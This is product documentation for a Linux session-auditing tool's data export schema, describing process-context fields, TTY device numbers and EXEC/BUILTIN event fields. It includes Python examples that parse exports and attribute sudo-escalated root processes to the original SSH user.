Data export schema

Learn the structure of the Linux session and event data captured by Cmd (both within the web app and after export)

This page explains the structure of Cmd data, and how it appears when you export it for additional analysis or long-term storage. The first part explains important background information about the data, and the latter half details the fields included when you export various types of events.

Contents

  1. Introduction
  2. Linux process model: Foundational concepts
  3. TTY device major and minor numbers
  4. EXEC events
  5. BUILTIN events
  6. BACKFILL events
  7. ALERT events

Introduction

Cmd can export recorded Linux events as newline-delimited JSON to objects in your S3 and GCS buckets. These JSON objects share a common subset of fields, most notably event_type. The value of event_type is one of EXEC, BUILTIN or BACKFILL, and it determines which additional fields may be present in the object.

This document starts with a conceptual overview, followed by sections that describe the JSON object fields of the EXEC, BUILTIN and BACKFILL events.

Note: In the future, Cmd may add fields to the schema. Please ensure your data processing tools are configured to ignore unknown fields.

Cmd Audit and Cmd Control

This data schema applies to both the Cmd Control and Cmd Audit agents, with some caveats:

  • The Cmd Audit agent does not record BUILTIN events.
  • For analysis of data exported prior to May 2020, see the legacy data export schema.

Events: Linux process context

Many exported events contain information about their Linux process context. This information lets you determine who really created a process, regardless of local changes of user identity via sudo or su. It includes each process' controlling terminal, as well as whether its stdin, stdout and stderr are tied to that controlling terminal, which makes it easier to tell interactive processes started by humans from those started by services such as web servers.

There is a delicate balance between including too much or too little information with each event. More information about each event simplifies the processing of data from S3 and GCS because little or no information from other events is required to process each event; context is self-contained. Less information in the event means lower bandwidth requirements, RAM, and persistent storage usage.

Our solution is to include information in each event about several important related processes — but not about its entire process ancestry. We include information about the:

  • first connected (“inception”) session process;
  • session leader process;
  • last known user-entered process;
  • parent process; and,
  • the current (“self”) process, in which the event occurred.

Other than parent and self, these are detailed below.

Linux process model: Foundational concepts

Linux processes have hierarchical ancestry, wherein each process is created by a single parent process (using the fork() or clone() system calls). Much information is inherited from the parent process, including open file descriptors (e.g. stdin, stdout, stderr) and the Linux user ID. A session leader is the oldest ancestor process in a set of related processes such as an SSH session. You can identify session leaders by their having identical process IDs (PIDs) and session IDs (SIDs), and processes within a session have the SID value of that session’s session leader. Note that Linux servers can reuse PIDs over time (though not at the same time), so do not rely on the PID or SID alone to correlate events. Instead use the process UUIDs, which are generated by Cmd, and take into account boot ID, process start time, and other information to ensure they are unique. Much more can be learned about process hierarchy by running ps axjf in a Linux shell.

Process: “Inception session”

The inception session is the process responsible for a user’s first entry onto a server, where credentials are exchanged. For example, a Bash shell that results from logging in with SSH, AWS SSM, a serial terminal, or a console, is an inception session. When shared Linux users such as “ubuntu” or “ec2-user” are not in use, each inception session process is reliably associated with a user, based on their server login credentials. Even with shared users enabled, if you use Cmd to require MFA after login, Cmd will provide information about the actual user and their roles (in the cmd_user and cmd_roles fields described below).

There is one sub-category of inception session processes: internal inception sessions. These represent services, typically ones started when the server boots, such as web servers, databases, sshd, etc. Specifically, these are the processes started by the init process (PID 1, typically systemd). You can differentiate between internal and external inception sessions by looking at their parent PIDs, ancestor sessions, and whether they are interactive (have a controlling terminal).

Process: “Session leader”

A session leader is the process that starts a session. Typically, the inception session for an event is also its session leader. Exceptions to this rule can occur due to terminal multiplexers like tmux or screen, which call setsid(). When you enter a multiplexed session, it does not affect the inception session, but changes the session leader for events from that session to the multiplexed session itself. Multiplexed shell sessions do not go away if you log out of your inception session. System administrators often use them when facing network instability; they can reconnect and reattach to the multiplexed session, and Cmd will still associate the events from the multiplexed session with the same inception session.

Process: “Last known user-entered”

The last known user-entered process (LKUEP) is an estimation of the most recent ancestor of the event’s self process that was initiated by an external human user. Previously, Cmd determined whether a process was user-entered based on bash-specific information, but now uses information that works across more shells (ksh, zsh, etc). A user-entered process is defined by these criteria:

  1. Its parent process' stdin is reading from the controlling terminal (i.e. the user could have typed ls).
  2. Its parent process' stderr is writing to the controlling terminal.
  3. Its PGID differs from its parent process’ PGID.

Note that when a shell runs programs entered by users, for example ls, the shell reads what the user typed from its controlling terminal (ls and return) and creates a child process for ls that is in a new process group (with a new PGID). Programs in pipelines such as cat foo.txt | grep bar | wc -l all share the same process group. Therefore each program (cat, grep, and wc) will be the LKUEP for their descendant processes, until one of those descendants matches the above criteria. Even if a process matches the criteria, it will not become its own LKUEP.

To view the process tree in a terminal, you can use ps ajxf, and to check on the stdin and stderr of any processes, you can use lsof -p <pid1>,..,<pidN> | grep -E '(0u|2u)'. Also note that an event’s LKUEP and parent process executable basename correspond to the cmd_parent_cmd_root CQL value (dual valued).
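The following is an added example, not Cmd's own code, that applies the three user-entered criteria above to a constructed process table (sshd, a login bash, the cat | grep | wc pipeline, and a child spawned by grep) and walks each process' ancestry to find its LKUEP. The process model, the device numbers (pts/0 as 136,0; a pipe modelled as an anonymous device with major 0 and an illustrative minor of 13) and the PIDs are assumptions made for the example, not values from the page.

```python
"""
Added example, not Cmd's code: apply the three "user-entered" criteria to a
constructed process table and derive each process' last known user-entered
process (LKUEP) by walking its ancestry.

Assumptions (not from the page): processes carry only the fields needed here;
the controlling terminal is /dev/pts/0 (136,0); a stdin that is a pipe is an
anonymous device with major 0 (minor 13 is illustrative); sshd has no ctty.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

Dev = Tuple[int, int]  # (major, minor) device number


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    pgid: int
    exe: str
    ctty: Dev    # controlling terminal; (0, 0) when there is none
    stdin: Dev   # device behind fd 0
    stderr: Dev  # device behind fd 2


def is_user_entered(p: Proc, table: Dict[int, Proc]) -> bool:
    """The three criteria from the text, all evaluated against the parent."""
    parent = table.get(p.ppid)
    if parent is None or p.ctty == (0, 0):
        return False
    return (parent.stdin == p.ctty       # 1. parent reads its stdin from the ctty
            and parent.stderr == p.ctty  # 2. parent writes its stderr to the ctty
            and p.pgid != parent.pgid)   # 3. the child is in a new process group


def lkuep(p: Proc, table: Dict[int, Proc]) -> Optional[int]:
    """PID of the nearest user-entered ancestor; a process is never its own LKUEP."""
    cur = table.get(p.ppid)
    while cur is not None:
        if is_user_entered(cur, table):
            return cur.pid
        cur = table.get(cur.ppid)
    return None


def report(table: Dict[int, Proc]) -> Dict[int, Tuple[bool, Optional[int]]]:
    """pid -> (user_typed, LKUEP pid) for every process in the table."""
    return {pid: (is_user_entered(p, table), lkuep(p, table)) for pid, p in table.items()}


PTS0: Dev = (136, 0)
PIPE: Dev = (0, 13)   # anonymous pipe: major 0, minor illustrative
NONE: Dev = (0, 0)

# Constructed table: sshd -> login bash -> `cat foo.txt | grep bar | wc -l`,
# plus a child that grep spawned (e.g. a wrapper script calling sed).
TABLE: Dict[int, Proc] = {p.pid: p for p in [
    Proc(500, 1,   500, "/usr/sbin/sshd", NONE, NONE, NONE),
    Proc(510, 500, 510, "/bin/bash",      PTS0, PTS0, PTS0),  # login shell, session leader
    Proc(520, 510, 520, "/bin/cat",       PTS0, PTS0, PTS0),  # pipeline head, new pgid 520
    Proc(521, 510, 520, "/bin/grep",      PTS0, PIPE, PTS0),  # stdin is the pipe from cat
    Proc(522, 510, 520, "/usr/bin/wc",    PTS0, PIPE, PTS0),  # stdin is the pipe from grep
    Proc(530, 521, 520, "/bin/sed",       PTS0, PIPE, PTS0),  # spawned by grep, same pgid
]}
```

All three pipeline members come out user-entered (their parent bash reads the terminal and each is in the new job's process group), the login shell does not (sshd's stdin is not the terminal), and sed's LKUEP is grep even though sed shares grep's process group, because criterion 1 fails at grep's pipe-backed stdin.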

Example: Processes associated with EXEC events

The inception session, session leader, parent, and self processes are present in all exported events, even if some correspond to the same process. For example, consider the case where you login with SSH and in your login shell execute ls . For the EXEC event associated with your login shell, your login shell is both the self process and the inception session, the parent process is sshd, and the session leader is sshd’s session leader. For the EXEC event associated with ls , the inception session process is the login shell, the parent process is the login shell, the session leader is the login shell and the self process is ls . In rare cases, depending on the sensor technology and its configuration, a process may be absent from the event because it could not be captured quickly enough (e.g. a very short lived parent process).

TTY Device Major and Minor Numbers

The Linux process information in exported events contains device “major” and “minor” numbers for the controlling terminal, standard input (stdin), standard output (stdout) and standard error (stderr) file descriptors. This section describes how to interpret this information.

Controlling terminals ensure that Control-Z sends SIGTSTP to the foreground process group, determine whether user input is echoed on screen, and perform other tasks related to the user interface. Rather than requiring every program that can start interactive sessions (such as sshd) to re-implement this logic, the Linux kernel provides TTY devices so the logic can be shared. Each device is identified by a major and a minor number.

Controlling terminals in Linux are typically one of the following:

  • Pseudo terminal:
    Session input comes from over the network, for example from SSH or SSM.
  • Serial terminal:
    Session input comes from a UART/serial chip on the motherboard or virtual hardware.
  • Virtual console:
    Session input comes from a keyboard device (USB, PS2, virtual, etc).
  • None:
    Services do not need controlling terminals.
Major and minor number ranges for controlling terminals:

  Device            Major number   Minor number   Example
  Pseudo terminal   136 to 143     0 to 254       136,1 -> /dev/pts/1
  Virtual console   4              0 to 63        4,2 -> /dev/tty2
  Serial terminal   4              64 to 254      4,64 -> /dev/ttyS0
  No device         0              -              -

The device major and minor numbers associated with a process' stdin, stdout and stderr are included in exported events. They match the numbers above when the descriptor is bound to the controlling terminal. When a descriptor is redirected to a regular file, the numbers are those of the block device (disk) and partition holding that file, e.g. 8,1. Two other cases are common enough to recognise: /dev/null is 1,3, and a pipe or socket is an anonymous device with major 0. Note also that the kernel allows minor numbers above 255 (a busy host can have /dev/pts/300 as 136,300), so treat the major number as the reliable classifier.

Learn more about Linux devices.
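As an added example (not Cmd's code), the helper below decodes the ctty/stdin/stdout/stderr device numbers found in an exported event into a device class and path, then derives the interactive_session and interactive_process flags the way the schema defines them. It assumes the ranges in the table above, extends them with the legacy devices.txt rule that majors 137 to 143 continue the /dev/pts numbering after 136,255 (on current kernels major 136 is used with larger minors, so the formula reduces to /dev/pts/<minor>), and treats 1,3 as /dev/null; the event fragments are constructed.

```python
"""
Added example, not Cmd's code: decode the major/minor device numbers carried
in an exported event and derive interactive_session / interactive_process.

Assumptions (not from the page): ranges as in the table above; majors
137..143 continue /dev/pts numbering after 136,255 (legacy devices.txt
layout); 1,3 is /dev/null; anything else is "other". Events are constructed.
"""
from typing import Dict, Tuple

PTS_MAJORS = range(136, 144)  # Unix98 pseudo terminal slaves, /dev/pts/N
TTY_MAJOR = 4                 # virtual consoles (minor < 64) and serial ports (minor >= 64)


def describe_device(major: int, minor: int) -> Tuple[str, str]:
    """Return (device class, device path) for a controlling terminal or std* descriptor."""
    if (major, minor) == (0, 0):
        return ("none", "")
    if (major, minor) == (1, 3):
        return ("null device", "/dev/null")
    if major in PTS_MAJORS:
        return ("pseudo terminal", f"/dev/pts/{(major - 136) * 256 + minor}")
    if major == TTY_MAJOR and minor < 64:
        return ("virtual console", f"/dev/tty{minor}")
    if major == TTY_MAJOR:
        return ("serial terminal", f"/dev/ttyS{minor - 64}")
    return ("other", f"{major},{minor}")  # e.g. the block device holding a redirected file


def _dev(ev: Dict[str, int], prefix: str, fd: str) -> Tuple[int, int]:
    return (ev[f"{prefix}_{fd}_major"], ev[f"{prefix}_{fd}_minor"])


def interactive_flags(ev: Dict[str, int], prefix: str = "self") -> Tuple[bool, bool]:
    """(interactive_session, interactive_process) for the process named by prefix.

    interactive_session: the process has a controlling terminal at all (the ctty
    is a per-session property, so any member's ctty answers for the session).
    interactive_process: its stdin AND stderr are that terminal, so redirects
    such as 2>/dev/null make a process non-interactive inside an interactive session.
    """
    ctty = _dev(ev, prefix, "ctty")
    has_ctty = ctty != (0, 0)
    return has_ctty, has_ctty and _dev(ev, prefix, "stdin") == ctty and _dev(ev, prefix, "stderr") == ctty


def _event(ctty, stdin, stdout, stderr) -> Dict[str, int]:
    """Constructed event fragment carrying only the self_* device fields."""
    ev: Dict[str, int] = {}
    for fd, (major, minor) in (("ctty", ctty), ("stdin", stdin), ("stdout", stdout), ("stderr", stderr)):
        ev[f"self_{fd}_major"], ev[f"self_{fd}_minor"] = major, minor
    return ev


PTS1, NULL, SDA1, NONE = (136, 1), (1, 3), (8, 1), (0, 0)  # /dev/pts/1, /dev/null, /dev/sda1, none
EV_SHELL_CMD = _event(PTS1, PTS1, PTS1, PTS1)   # `ls` typed at an SSH shell
EV_REDIRECTED = _event(PTS1, PTS1, SDA1, NULL)  # `ls > /tmp/out 2>/dev/null` from that shell
EV_SERVICE = _event(NONE, NONE, NONE, NONE)     # a daemon started by init, no terminal
```

The redirected case is the one to remember when writing detections: the event still belongs to an interactive session, but interactive_process is false because stderr went to /dev/null.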

EXEC event data schema

In Linux, “running” a program requires an “EXEC”. EXEC is short for execute, as in “execute this program”, and uses the execve() system call. The following tables describe the fields of the JSON objects exported by Cmd for the EXEC events from your Cmd-monitored servers.

Properties that appear once per EXEC event

Field name Description
version String. The version number of the event type’s data structure (e.g. Exec 1.0.0). Major version changes (e.g. 1.0.0 to 2.0.0) reflect updates that may require significant changes to your data processing pipelines. Minor version number changes refer to backwards-compatible changes such as adding fields.
event_type String. Value is always “EXEC”. These JSON objects represent events that result from exec() system calls.
server_uuid String. UUID of the server that emitted the event.
project_id String. ID of the project that emitted the event.
company_id String. ID of the company that emitted the event.
event_uuid String. UUID of the event itself.
process_uuid String. UUID of the process that emitted the event.
session_uuid String. UUID of the session that emitted the event.
parent_uuid String. UUID of the parent of the process that emitted the event.
group_uuid String. UUID of the process group for the process that emitted the event.
inception_session_city String. City associated with the source IP of the inception SSH session, if available. (A private IP will not show a city).
E.g. Boulder
inception_session_country String. Country associated with the inception SSH session’s source IP address, if available.
E.g. United States
inception_session_ip_risk Float. Risk rating of the inception SSH session’s source IP address, according to MaxMind. From 0.01 to 99, where higher scores indicate higher risk.
E.g. 87
inception_session_ip_latitude Float. WGS84 latitude associated with the inception SSH session’s source IP address, if available. Values range from -90.0000 to 90.0000.
E.g. 49.1239
inception_session_ip_longitude Float. WGS84 longitude associated with the inception SSH session’s source IP address, if available. Values range from -180.0000 to 180.0000.
E.g. -123.1938
inception_session_region String. Region associated with the inception SSH session’s source IP address, if available.
E.g. Colorado
interactive_session Boolean. Whether the session is interactive (has a controlling terminal).
interactive_process Boolean. Whether the self process' stdin and stderr are bound to the controlling terminal. In Cmd Control agents prior to v1.4.0, true when the process was launched from bash and bash considered itself to be interactive as per the bash man page.
pid_ns_ino String. PID namespace ID from which the process was observed. See “man 7 namespaces” for additional details.
server_groups Any server groups you have associated with this agent install using its config.ini or the Cmd web app.
E.g. web-server, production
server_hostname Hostname associated with the Linux server, VM, or container where the agent is deployed.
E.g. webapp1-e9381
server_name Name assigned to the server in the config.ini or in the Cmd web app.
E.g. webapp1
server_ips IP addresses associated with the server, VM, or container where the agent is deployed.
E.g. 192.168.22.3
session_leader Boolean. Whether the self process is a session leader. A session leader is the process that initially created the session, and its SID is the same as its PID. See “man credentials” to learn more.
thread_id (Cmd Audit only). Integer. The Linux thread ID of the thread in which the event occurred. This, along with cpu_id, can help disambiguate events of the same type that occur in rapid succession, when event_time may not be granular enough.
boot_id String. Unique identifier for the currently booted Linux OS. It is newly generated every reboot. Originates from /proc/sys/kernel/random/boot_id.
cpu_id (Cmd Audit only). Integer. Identifies the CPU core on the system on which this event was observed.
event_time String. A timestamp that represents when the event started.
Format: RFC3339Nano
user_typed Boolean. Whether the event was the result of a user-typed command. (In other words, whether the self process matches the LKUEP criteria.)
uts_domain_name Domain name (as per “man 2 getdomainname”) associated with the Linux server, VM, or container in which the process is executed.
uts_hostname Hostname (as per “man 2 gethostname”) associated with the Linux server, VM, or container in which the associated process is executed. May differ from the server_hostname (UTS hostname where the agent is running) when the process execution is in a container and the agent is not (such as with a Kubernetes DaemonSet configured to run in the host PID namespace).
E.g. my-pod123
inception_session_uuid String. UUID of the inception session for the process that emitted this event.
E.g. e3b24ade-8b84-546f-b969-d95dca2641b8
last_known_uec_parent_uuid String. UUID of the last known UEC parent of the process that emitted this event.
E.g. e3b24ade-8b84-546f-b969-d95dca2641b8
cri_namespace The process' Kubernetes namespace.
E.g. default
cri_pod_name The process' Kubernetes pod name.
E.g. cmd-nginx
cri_node_name The process' Kubernetes node name.
E.g. node-1234
cri_container_id The process' runtime container ID, i.e. the CRI-O or containerd container ID.
E.g. 0c4e3b80c0b3fb798b4163dbc489ed739e67435bdfd83545c7fc45c0419c135c
cri_container_image The process' container image’s hash.
E.g. sha256:bd0ad0dd8520627a4478298cd74fead558b7819167a5b40d09ea6aaee9c92153
cri_container_name The process' container name.
E.g. nginx

Properties that appear multiple times per EXEC event

The *_-prefixed properties below are present five times in each event, once for each process the event describes: self; parent; session; inception_session; and last_known_uec_parent. For example, the field described here as *_exe appears in each exported event as self_exe, parent_exe, session_exe, inception_session_exe, and last_known_uec_parent_exe. The unprefixed fields at the end of the table (shell_*, inception_*, cmd_user, cmd_roles, exe, cwd, args, trigger_ids and inception_session_env_vars) appear once per event.

Field name Description
*_exe String. Absolute file path to the command.
*_user String. Username associated with the effective user ID (EUID). Note: for containerized workloads observed from an outer PID namespace, this value may be incorrect or missing because the /etc/passwd with the correct username resides within the container image.
*_pid Integer. The process’ PID. See “man credentials” for additional details.
*_ppid Integer. The process’ PPID. See “man credentials” for additional details.
*_sid Integer. The process’ SID. Identifies a collection of processes for job control purposes. Equals the PID of the session leader. See “man credentials” for additional details.
*_pgid Integer. PGID of the process. Identifies a collection of processes for job control (signalling) purposes. Equal to the PID of the process group leader. See “man credentials” for additional details.
*_suid Integer. The process’ saved user ID (SUID). Allows a process to elevate and drop privileges as a user. See “man credentials” for additional details.
*_sgid Integer. The process’ saved set group ID (SGID). Allows a process to elevate and drop privileges as a group. See “man credentials” for additional details.
*_ruid Integer. The process’ real user ID (RUID). Identifies the user who owns the process. See “man credentials” for additional details.
*_rgid Integer. The process’ real group ID (RGID). The RGID identifies the group that owns the process. See “man credentials” for additional details.
*_euid Integer. The process’ effective user ID (EUID). Determines permissions for accessing shared resources and files as a user. See “man credentials” for additional details.
*_egid Integer. The process’ effective group ID (EGID). Determines permissions for accessing shared resources and files as a group. See “man credentials” for additional details.
*_ctty_minor Integer. Minor device number of the process’ controlling terminal. Uniquely identifies a particular device within a general class.
*_ctty_major Integer. Major device number of the process’ controlling terminal. The major number identifies the general class of device, and is used by the kernel to find the appropriate driver.
*_stdin_minor Integer. Minor device number of the process’ standard input.
*_stdin_major Integer. Major device number of the process’ standard input.
*_stdout_minor Integer. Minor device number of the process’ standard output.
*_stdout_major Integer. Major device number of the process’ standard output.
*_stderr_minor Integer. Minor device number of the process’ standard error.
*_stderr_major Integer. Major device number of the process’ standard error.
*_start_time_ticks String. Start time of the process in clock ticks since system boot. See “starttime” under /proc/[pid]/stat in “man proc” for additional details. The value is stored as a string because it is unsafe for JavaScript to store a uint64 as an integer.
shell_completion Boolean. Whether shell completion is set. Meaningful only when the self process is bash.
shell_rl_buffer String. The user-typed command obtained from the shell’s read line buffer. Meaningful only when the self process was launched from or is bash.
shell_command_number String. The number of commands executed so far in the current shell. The value is stored as a string because it is unsafe for JavaScript to store a uint64 as an integer. Meaningful only when the self process was launched from or is bash.
inception_estimated_start_time String. Estimated time for when the inception session started.
inception_entry_mechanism String. Entry mechanism used in the inception session. Can help determine how the user connected. Current values are UNKNOWN, SSH, INIT, TTY, CONSOLE, AWS_SSM and OTHER. For Cmd Control agents prior to v1.4.0 values are SSH, TTY and UNKNOWN.
inception_source_ip String. The source IP address of where the inception session started, if applicable, for the type of the inception_entry_mechanism.
cmd_user String. Cmd username, typically an email address. Populated after the first MFA in a session.
cmd_roles Array of strings. Cmd roles associated with the Cmd user after successful MFA into this session
exe String. Absolute file path of the executed command. This should be used in preference to self_exe, even though they will have the same value. See /proc/[pid]/exe in “man proc” for additional details.
cwd String. Absolute file path of the current working directory of the self process at the time of the exec. See /proc/[pid]/cwd in “man proc” for additional details.
args Array of strings. The command line arguments used when invoking the program. These arguments are passed to the entry point of the executable. The first item in the array is typically but not always the base name of the executable as per /proc/<pid>/cmdline.
trigger_ids Array of strings. A list of the trigger IDs associated with the event.
inception_session_env_vars List of 1-5 key value pairs. The environment variables captured at session start. Will not appear unless you set up env var capture. E.g.: [{"name": "env var name", "value": "env var value"}]
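The following is an added example, not Cmd's code, of consuming an export: it reads newline-delimited JSON, routes each object on event_type, ignores event types and fields this schema version does not define (as the note in the introduction asks), orders events by boot_id and the string-typed *_start_time_ticks, and then uses the per-process context to answer "who really started this root process?" by flagging every EXEC, BUILTIN or BACKFILL event whose self process has EUID 0 while its inception session was entered by a non-root user. The export below is constructed with a subset of the schema's fields; every UUID, IP address and username in it is made up.

```python
"""
Added example, not Cmd's code: parse an NDJSON export and attribute root
processes to the human who entered the session (sudo/su detection).

Assumptions (not from the page): only a subset of the schema fields is
populated; the export, UUIDs, IPs and usernames below are constructed.
"""
import json
from collections import Counter
from typing import Dict, List, Tuple

KNOWN_TYPES = {"EXEC", "BUILTIN", "BACKFILL"}

SSH_SESSION = "11111111-1111-4111-8111-111111111111"   # alice's SSH login (made up)
INIT_SESSION = "22222222-2222-4222-8222-222222222222"  # services started by init (made up)


def _rec(event_type: str, uuid: str, exe: str, ruid: int, euid: int,
         user_typed: bool, ticks: int, **extra) -> dict:
    """One constructed export record carrying a subset of the schema fields."""
    rec = {
        "version": f"{event_type.capitalize()} 1.0.0",
        "event_type": event_type,
        "event_uuid": uuid,
        "boot_id": "b1c2d3e4-0000-4000-8000-000000000001",
        "inception_session_uuid": SSH_SESSION,
        "inception_entry_mechanism": "SSH",
        "inception_source_ip": "203.0.113.7",   # TEST-NET-3 documentation address
        "inception_session_user": "alice",
        "inception_session_euid": 1000,
        "exe": exe, "self_exe": exe,
        "self_ruid": ruid, "self_euid": euid,
        "user_typed": user_typed,
        "self_start_time_ticks": str(ticks),    # a string in the schema (uint64-safe)
    }
    rec.update(extra)
    return rec


AS_SERVICE = dict(inception_session_uuid=INIT_SESSION, inception_entry_mechanism="INIT",
                  inception_source_ip="", inception_session_user="root", inception_session_euid=0)

RECORDS = [
    _rec("BACKFILL", "e6", "/usr/sbin/sshd", 0, 0, False, 200, **AS_SERVICE),
    _rec("EXEC", "e5", "/usr/sbin/nginx", 0, 0, False, 300, **AS_SERVICE),
    _rec("EXEC", "e1", "/bin/bash", 1000, 1000, False, 1000, future_field="ignored"),
    _rec("EXEC", "e2", "/usr/bin/sudo", 1000, 0, True, 1500, args=["sudo", "-i"]),  # setuid: EUID 0
    _rec("EXEC", "e3", "/bin/bash", 0, 0, False, 1510, args=["-bash"]),
    _rec("BUILTIN", "e4", "/bin/bash", 0, 0, True, 1510, args=["cd", "/root"]),
    {"event_type": "FUTURE", "event_uuid": "e7"},      # not part of this schema version
]
SAMPLE_EXPORT = "".join(json.dumps(r) + "\n" for r in RECORDS)


def parse_export(text: str) -> Tuple[List[dict], int]:
    """Parse NDJSON; keep known event types in process-start order, count the rest."""
    events, skipped = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        obj = json.loads(line)          # unknown fields ride along and are simply not read
        if obj.get("event_type") not in KNOWN_TYPES:
            skipped += 1
            continue
        events.append(obj)
    # Ticks are exported as strings; convert before comparing. Sort is stable on ties.
    events.sort(key=lambda e: (e.get("boot_id", ""), int(e.get("self_start_time_ticks", "0"))))
    return events, skipped


def escalated(events: List[dict]) -> List[Tuple[str, str, str, str]]:
    """(event_type, inception user, inception source IP, exe) for every process running
    as root in a session whose inception process was not root. A missing
    inception_session_euid defaults to 0 so it never produces a false positive."""
    hits = []
    for e in events:
        if e.get("self_euid") == 0 and e.get("inception_session_euid", 0) != 0:
            hits.append((e["event_type"], e.get("inception_session_user", ""),
                         e.get("inception_source_ip", ""), e.get("exe") or e.get("self_exe", "")))
    return hits


def events_per_inception(events: List[dict]) -> Dict[str, int]:
    """How many events each inception session produced, regardless of event_type."""
    return dict(Counter(e["inception_session_uuid"] for e in events))
```

The first hit is the exec of sudo itself, which is where the EUID changed (self_ruid is still 1000 there); the root shell and the cd builtin inside it inherit the attribution to alice and her source IP through the inception_session_* fields, which is the point of carrying that context in every event. The nginx and sshd events are not flagged because their inception session is the init-started (internal) session.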

BUILTIN event data schema

These events describe Bash builtin commands, and consequently only appear as a result of Bash sessions. They are recorded only by Cmd Control. The following tables describe the Builtin object’s JSON fields. Bash builtins are commands such as cd and echo that are handled internally by the Bash process itself, instead of forking and executing another program as happens when you type something like /bin/ls. Some builtins also have an executable counterpart, for example the echo builtin versus the /bin/echo executable; the executable versions are always represented with the EXEC event_type.

Properties that appear once per BUILTIN event

Field name Description
version String. The version number of the event type’s data structure (e.g. Builtin 1.0.0). Major version changes (e.g. 1.0.0 to 2.0.0) reflect updates that may require significant changes to your data processing pipelines. Minor version number changes refer to backwards-compatible changes such as adding fields.
event_type String. Value is “BUILTIN”. These JSON objects represent events that result from builtin Bash commands.
server_uuid String. UUID of the server that emitted the event.
project_id String. ID of the project that emitted the event.
company_id String. ID of the company that emitted the event.
event_uuid String. UUID of the event itself.
process_uuid String. UUID of the process that emitted the event.
session_uuid String. UUID of the session that emitted the event.
group_uuid String. UUID of the process group for the process that emitted the event
parent_uuid String. UUID of the parent of the process that emitted the event.
inception_session_uuid String. UUID of the inception session for the process that emitted this event.
E.g. e3b24ade-8b84-546f-b969-d95dca2641b8
last_known_uec_parent_uuid String. UUID of the last known UEC parent of the process that emitted this event.
E.g. e3b24ade-8b84-546f-b969-d95dca2641b8
interactive_session Boolean. Whether the session is interactive (has a controlling terminal).
interactive_process Boolean. Whether the self process’ stdin and stderr are bound to the controlling terminal. In Cmd Control agents prior to v1.4.0, true when the process was launched from bash and bash considered itself to be interactive as per the bash man page.
session_leader Boolean. Whether the self process is a session leader. A session leader is the process that initially created the session, and its SID is the same as its PID. See “man credentials” to learn more.
cpu_id (Cmd Audit only). Integer. Identifies the CPU core on the system on which this event was observed.
thread_id (Cmd Audit only). Integer. The Linux thread ID of the thread in which the event occurred. This, along with cpu_id, can help disambiguate events of the same type that occur in rapid succession, when event_time may not be granular enough.
event_time String. A timestamp that represents when the event started. Format: RFC3339Nano
boot_id String. Unique identifier for the currently booted Linux OS. It is newly generated every reboot. Originates from /proc/sys/kernel/random/boot_id.
pid_ns_ino String. PID namespace ID from which the process was observed. See “man 7 namespaces” for additional details.
user_typed Boolean. Whether the event was the result of a user-typed command. (In other words, whether the self process matches the LKUEP criteria.)

Properties that appear multiple times per BUILTIN event

The *_-prefixed properties below are present five times in each event, once for each process the event describes: self; parent; session; inception_session; and last_known_uec_parent. For example, the field described here as *_exe appears in each exported event as self_exe, parent_exe, session_exe, inception_session_exe, and last_known_uec_parent_exe. The unprefixed fields at the end of the table (shell_*, inception_*, cmd_user, cmd_roles, exe, cwd, args, trigger_ids and inception_session_env_vars) appear once per event.

Field name Description
*_exe String. Absolute file path to the command.
*_user String. Username associated with the effective user ID (EUID). Note: for containerized workloads observed from an outer PID namespace, this value may be incorrect or missing because the /etc/passwd with the correct username resides within the container image.
*_pid Integer. The process’ PID. See “man credentials” for additional details.
*_ppid Integer. The process’ PPID. See “man credentials” for additional details.
*_sid Integer. The process’ SID. Identifies a collection of processes for job control purposes. Equals the PID of the session leader. See “man credentials” for additional details.
*_pgid Integer. PGID of the process. Identifies a collection of processes for job control (signalling) purposes. Equal to the PID of the process group leader. See “man credentials” for additional details.
*_suid Integer. The process’ saved user ID (SUID). Allows a process to elevate and drop privileges as a user. See “man credentials” for additional details.
*_sgid Integer. The process’ saved set group ID (SGID). Allows a process to elevate and drop privileges as a group. See “man credentials” for additional details.
*_ruid Integer. The process’ real user ID (RUID). Identifies the user who owns the process. See “man credentials” for additional details.
*_rgid Integer. The process’ real group ID (RGID). The RGID identifies the group that owns the process. See “man credentials” for additional details.
*_euid Integer. The process’ effective user ID (EUID). Determines permissions for accessing shared resources and files as a user. See “man credentials” for additional details.
*_egid Integer. The process’ effective group ID (EGID). Determines permissions for accessing shared resources and files as a group. See “man credentials” for additional details.
*_ctty_minor Integer. Minor device number of the process’ controlling terminal. Uniquely identifies a particular device within a general class.
*_ctty_major Integer. Major device number of the process’ controlling terminal. The major number identifies the general class of device, and is used by the kernel to find the appropriate driver.
*_stdin_minor Integer. Minor device number of the process’ standard input.
*_stdin_major Integer. Major device number of the process’ standard input.
*_stdout_minor Integer. Minor device number of the process’ standard output.
*_stdout_major Integer. Major device number of the process’ standard output.
*_stderr_minor Integer. Minor device number of the process’ standard error.
*_stderr_major Integer. Major device number of the process’ standard error.
*_start_time_ticks String. Start time of the process in clock ticks since system boot. See “starttime” under /proc/[pid]/stat in “man proc” for additional details. The value is stored as a string because it is unsafe for JavaScript to store a uint64 as an integer.
shell_completion Boolean. Whether shell completion is set. Meaningful only when the self process is bash.
shell_rl_buffer String. The user-typed command obtained from the shell’s read line buffer. Meaningful only when the self process was launched from or is bash.
shell_command_number String. The number of commands executed so far in the current shell. The value is stored as a string because it is unsafe for JavaScript to store a uint64 as an integer. Meaningful only when the self process was launched from or is bash.
inception_estimated_start_time String. Estimated time for when the inception session started.
inception_entry_mechanism String. Entry mechanism used in the inception session. This helps determine how the user connected. Current values are UNKNOWN, SSH, INIT, TTY, CONSOLE, AWS_SSM and OTHER. For Cmd Control agents prior to v1.4.0 values are SSH, TTY and UNKNOWN.
inception_source_ip String. The source IP address of where the inception session started, if applicable, for the type of the inception_entry_mechanism.
cmd_user String. Cmd username, typically an email address. Populated after the first MFA in a session.
cmd_roles Array of strings. Cmd roles associated with the Cmd user after successful MFA into this session.
exe String. Absolute file path of the executed command. This should be used in preference to self_exe, even though they will have the same value. See /proc/[pid]/exe in “man proc” for additional details.
cwd String. Absolute file path of the current working directory of the self process (the shell) at the time the builtin ran. See /proc/[pid]/cwd in “man proc” for additional details.
args Array of strings. The command line arguments used when invoking the program. These arguments are passed to the entry point of the executable. The first item in the array is typically but not always the base name of the executable as per /proc/<pid>/cmdline.
trigger_ids Array of strings. A list of the trigger IDs associated with the event.
inception_session_env_vars List of 1-5 key value pairs. The environment variables captured at session start. Will not appear unless you set up env var capture.
